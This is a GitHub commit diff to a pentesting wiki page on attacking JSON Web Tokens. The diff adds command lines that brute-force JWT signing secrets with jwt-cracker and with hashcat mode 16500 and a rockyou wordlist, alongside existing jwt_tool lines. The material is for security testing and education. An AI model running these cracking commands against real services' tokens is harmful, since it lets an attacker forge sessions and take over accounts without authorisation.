Skip to content

Commit 8f8eb9f

Browse files
carlospolopgitbook-bot
authored andcommitted
GitBook: [master] one page modified
1 parent 522c1e0 commit 8f8eb9f

File tree

1 file changed

+6
-0
lines changed

1 file changed

+6
-0
lines changed

pentesting-web/hacking-jwt-json-web-tokens.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -62,6 +62,12 @@ python3 jwt_tool.py -d wordlists.txt <JWT token>
6262

6363
#https://github.com/mazen160/jwt-pwn
6464
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
65+
66+
#https://github.com/lmammino/jwt-cracker
67+
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
68+
69+
#hashcat
70+
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
6571
```
6672

6773
## Modify the algorithm to None \(CVE-2015-9235\)

0 commit comments

Comments
 (0)